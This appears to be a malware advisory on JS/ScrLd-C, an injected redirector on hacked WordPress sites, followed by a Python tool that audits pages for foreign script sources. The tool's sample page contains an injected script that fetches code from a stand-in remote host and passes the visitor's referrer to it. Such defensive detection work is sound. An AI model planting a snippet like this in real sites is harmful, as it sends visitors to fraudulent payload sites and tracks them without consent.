For the week of 24 Jan 2011
Also Known As:
- Avira: JS/Clicker.CA
- Kaspersky: Trojan-Clicker.JS.Agent.ma
- McAfee: JS/Wonka
- Microsoft: TrojanClicker:HTML/Iframe.J
- Trend Micro: JS_WONKA.SM
The purpose of the injected script is redirection. The scripts load a second script from a remote command-and-control (C&C) server and, based on its contents, attempt to redirect the visitor to a payload site. This allows the final payload site to be changed at the first-level C&C without the need to change every hacked site. The referrer and keyword parameters are passed through from the injected site to allow the hackers to track how the victims arrive at the payload site.
JS/ScrLd-C is a general-purpose script used in web-based attacks, but it has mostly been used by hackers who have broken into sites running WordPress and are using it to redirect innocent users to sites selling fake anti-virus software.
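For site owners checking their own pages for the behaviour described above, this added example (not part of the original write-up and not derived from the actual JS/ScrLd-C code) audits a rendered page for script tags that pull code from hosts outside an allowlist and for inline scripts that pass `document.referrer` to such a host. The `audit` function, the allowlist, the sample page, its hostnames and the `ref`/`kw` parameter names are all assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"""(?:https?:)?//[^\s'"<>)]+""")

# Constructed sample page; hosts and parameter names are hypothetical.
SAMPLE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
<script>var s=document.createElement('script');
s.src='http://cc.example.net/in.js?ref='+encodeURIComponent(document.referrer)+'&kw=shoes';
document.getElementsByTagName('head')[0].appendChild(s);</script>
</head><body>post</body></html>"""

class ScriptAudit(HTMLParser):
    """Collects (kind, url) findings for scripts that reach off-allowlist hosts."""
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = set(allowed_hosts)
        self.in_script, self.buf, self.findings = False, [], []

    def _off_site(self, url):
        host = urlparse(url).hostname  # None for relative URLs (same site)
        return host is not None and host not in self.allowed

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script, self.buf = True, []
            src = dict(attrs).get("src")
            if src and self._off_site(src):
                self.findings.append(("external-src", src))

    def handle_data(self, data):
        if self.in_script:
            self.buf.append(data)  # script bodies may arrive in several chunks

    def handle_endtag(self, tag):
        if tag == "script" and self.in_script:
            self.in_script = False
            body = "".join(self.buf)
            urls = [u for u in URL_RE.findall(body) if self._off_site(u)]
            # Heuristic: inline code that reads the referrer and names a foreign host.
            if urls and "document.referrer" in body:
                self.findings.append(("referrer-passthrough", urls[0]))

def audit(html, allowed_hosts):
    parser = ScriptAudit(allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings
```

A finding is a lead for manual review rather than a verdict: legitimate analytics snippets also read the referrer, and obfuscated injections will not contain a literal URL.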